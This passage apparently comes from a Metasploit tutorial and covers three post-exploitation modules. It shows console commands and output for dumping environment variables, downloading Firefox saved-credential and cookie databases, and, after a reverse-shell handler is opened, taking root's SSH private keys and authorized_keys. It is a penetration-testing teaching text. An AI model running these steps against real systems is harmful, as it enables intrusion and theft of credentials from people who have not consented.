env
The env module will collect and display the operating system environment variables on the compromised system.
meterpreter > run post/multi/gather/env
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 37 Stepping 2, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=2502
Path=C:\Perl\site\bin;C:\Perl\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;c:\python25;c:\Program Files\Microsoft SQL Server\90\Tools\$
TEMP=C:\WINDOWS\TEMP
TMP=C:\WINDOWS\TEMP
windir=C:\WINDOWS
meterpreter >
firefox_creds
The firefox_creds post-exploitation module gathers saved credentials and cookies from an installed instance of Firefox on the compromised host. Third-party tools can then be used to extract the passwords if there is no master password set on the database.
meterpreter > run post/multi/gather/firefox_creds [*] Checking for Firefox directory in: C:\Documents and Settings\Administrator\Application Data\Mozilla\ [*] Found Firefox installed [*] Locating Firefox Profiles... [+] Found Profile 8r4i3uac.default [+] Downloading cookies.sqlite file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default [+] Downloading cookies.sqlite-journal file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default [+] Downloading key3.db file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default [+] Downloading signons.sqlite file from: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\8r4i3uac.default meterpreter >
ssh_creds
The ssh_creds module will collect the contents of user’s .ssh directory on the targeted machine. Additionally, known_hosts, authorized_keys, and any other files are also downloaded.
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD linux/x86/shell_reverse_tcp payload => linux/x86/shell_reverse_tcp msf exploit(handler) > set LHOST 192.168.1.101 lhost => 192.168.1.101 msf exploit(handler) > set LPORT 443 lport => 443 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.101:443 [*] Starting the payload handler... [*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.101:37059) at 2011-06-02 11:06:02 -0600 id uid=0(root) gid=0(root) groups=0(root) ^Z Background session 1? [y/N] y msf exploit(handler) > use post/multi/gather/ssh_creds msf post(ssh_creds) > show options Module options (post/multi/gather/ssh_creds): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. msf post(ssh_creds) > set SESSION 1 session => 1 msf post(ssh_creds) > run [*] Determining session platform and type... [*] Checking for OpenSSH profile in: /bin/.ssh [-] OpenSSH profile not found in /bin/.ssh [*] Checking for OpenSSH profile in: /dev/.ssh ...snip... [-] OpenSSH profile not found in /var/www/.ssh [+] Downloading /root/.ssh/authorized_keys [+] Downloading /root/.ssh/authorized_keys2 [+] Downloading /root/.ssh/id_rsa [+] Downloading /root/.ssh/id_rsa.pub [+] Downloading /root/.ssh/known_hosts [+] Downloading /usr/NX/home/nx/.ssh/authorized_keys2 [+] Downloading /usr/NX/home/nx/.ssh/default.id_dsa.pub [+] Downloading /usr/NX/home/nx/.ssh/known_hosts [+] Downloading /usr/NX/home/nx/.ssh/restore.id_dsa.pub [*] Post module execution completed msf post(ssh_creds) >